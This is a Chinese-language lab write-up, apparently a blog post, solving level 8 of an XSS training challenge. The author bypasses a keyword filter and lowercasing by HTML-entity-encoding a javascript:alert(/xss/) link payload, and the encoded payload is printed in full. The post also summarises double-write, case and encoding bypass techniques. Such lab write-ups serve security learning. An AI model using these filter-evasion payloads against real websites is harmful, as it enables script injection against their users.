Level-08:编码绕过
(0)


来到第八关,直接上 <script>alert(/xss/)</script>
查看下网页源码,可以看到,原来是把我输入的内容做了一个超链接,而且可以看到 script 被替换成了 scr_ipt

猜测这里存在 str_replace() 函数直接构造并尝试大小写可不可绕过的 payload :javAsCript:alert(/xss/) ---> 结果是不行,看来是存在 strtolow() 函数,那就得想想其它办法了。
能不能将其进行 HTML 编码试试看呢?
javascript:alert(/xss/) 进行 HTML 编码得到:
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x2f;&#x78;&#x73;&#x73;&#x2f;&#x29;
再将其进行上传,点击友情链接,成功啦~

小结一下:我们现在有双写绕过 || 大小写绕过 || 编码绕过
阅读源码,跟前几关无差但是更严格了,黑名单限制更多了:

本文为作者HD_More发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论